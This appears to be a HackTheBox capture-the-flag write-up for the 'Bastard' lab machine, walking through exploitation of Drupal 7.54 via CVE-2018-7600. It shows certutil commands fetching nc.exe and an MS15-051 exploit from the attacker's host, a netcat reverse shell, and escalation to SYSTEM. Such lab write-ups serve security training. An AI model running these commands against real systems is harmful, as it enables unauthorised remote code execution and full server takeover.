Bastard - Medium

OSCP Prep Box

Introduction@Bastard:~$

Name

Bastard

10.10.10.9

Window

Points

Difficulty

Medium

Creator

ch4p

Release Date

19 March 2017

Enumeration

Nmap

# Nmap 7.92 scan initiated Thu Dec 30 10:54:46 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.32s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 10:56:36 2021 -- 1 IP address (1 host up) scanned in 110.02 seconds

Only three ports were opened.

Web

Port 80 is running Drupal CMS. We should know that drupal has a lot of vulnerabilities and first we need to know what version of this to find the exploit. We can look up drupal version at CHANGELOG.txt

┌─[sheinn101@parrot]─[~/htb/oscp/bastard]
└──╼ [??]$ curl -s http://10.10.10.9/CHANGELOG.txt | head

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served

We can see that drupal is running at version 7.54 .

Finding Exploit

There is a lot of exploits and I chose python script. So we can easily run it.

https://github.com/pimps/CVE-2018-7600

┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "whoami"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-qYJ2NwZrrbby9Ni3lcPLtZgfUQqAbCtJcoQ6w_l2zug
[*] Triggering exploit to execute: whoami
nt authority\iusr

We can look up OS architecture with this command.

┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "wmic OS get OSArchitecture"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-6RIAIGKgoCtEq8pfK9I4voh1u6KpPFch5bnbDCVwEeg
[*] Triggering exploit to execute: wmic OS get OSArchitecture
OSArchitecture  
64-bit

This is 64 bit machine .Now let try to get reverse shell.

Getting Reverse Shell

┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-RhKepY9VqzbvkjVKZKOQ19DNKXfJ5BhSuBYWEz6irE4
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe
****  Online  ****
  0000  ...
  6e00
CertUtil: -URLCache command completed successfully.

First I upload nc.exe to the victim machine.

python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "nc.exe 10.10.14.7 443 -e cmd.exe"

Directory of c:\Users\dimitris\Desktop

19/03/2017  08:04     <DIR>          .
19/03/2017  08:04     <DIR>          ..
19/03/2017  08:06                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.808.027.136 bytes free

type user.txt
type user.txt
ba22fde1932d*******3d312f921a2
c:\Users\dimitris\Desktop>

Privilege Escalation

systeminfo

systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 
System Boot Time:          3/1/2022, 6:17:36 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use:    489 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Run exploit suggester (didn't show in here) and you will see there is a couple of exploit and I chose this ms15051x64.exe.

https://www.exploit-db.com/exploits/37049

Download and transfer to the victim machine like above.

c:\inetpub\drupal-7.54>                                                                                                                                               
certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"                                                                           
certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"                                                                                                  
****  Online  ****                                                                                                                                                    
  0000  ...                                                                                                                                                           
  d800                                                                                                                                                                
CertUtil: -URLCache command completed successfully.                                                                                                                   
                                                                                                                                                                      
dir                                      
dir                                      
 Volume in drive C has no label.         
 Volume Serial Number is 605B-4AAA       

 Directory of c:\inetpub\drupal-7.54     

03/01/2022  07:41     <DIR>          .                                             
03/01/2022  07:41     <DIR>          ..                                            
19/03/2017  12:42                317 .editorconfig                                 
19/03/2017  12:42                174 .gitignore                                    
19/03/2017  12:42              5.969 .htaccess                                     
19/03/2017  12:42              6.604 authorize.php                                 
19/03/2017  12:42            110.781 CHANGELOG.txt                                 
19/03/2017  12:42              1.481 COPYRIGHT.txt                                 
19/03/2017  12:42                720 cron.php                                      
19/03/2017  12:43     <DIR>          includes                                      
19/03/2017  12:42                529 index.php                                     
19/03/2017  12:42              1.717 INSTALL.mysql.txt                             
19/03/2017  12:42              1.874 INSTALL.pgsql.txt                             
19/03/2017  12:42                703 install.php                                   
19/03/2017  12:42              1.298 INSTALL.sqlite.txt                            
19/03/2017  12:42             17.995 INSTALL.txt                                   
19/03/2017  12:42             18.092 LICENSE.txt                                   
19/03/2017  12:42              8.710 MAINTAINERS.txt                               
19/03/2017  12:43     <DIR>          misc                                          
19/03/2017  12:43     <DIR>          modules                                       
03/01/2022  07:41             55.296 ms15-051x64.exe                               
03/01/2022  06:48             28.160 nc.exe                                        
19/03/2017  12:43     <DIR>          profiles

ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1748 created.
==============================
nt authority\system

We can execute the command as a system. Now we should try to get system shell.

cd c:\users\administrator\desktop

dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of c:\Users\Administrator\Desktop

19/03/2017  07:33     <DIR>          .
19/03/2017  07:33     <DIR>          ..
19/03/2017  07:34                 32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.965.696 bytes free

type root.txt.txt
type root.txt.txt
4bf12b963d********6f617f7ba7c
c:\Users\Administrator\Desktop>

https://app.hackthebox.com/profile/237587

Reference

https://github.com/pimps/CVE-2018-7600
https://www.exploit-db.com/exploits/37049

PreviousIntelligence - Medium NextTryHackMe

Last updated 3 years ago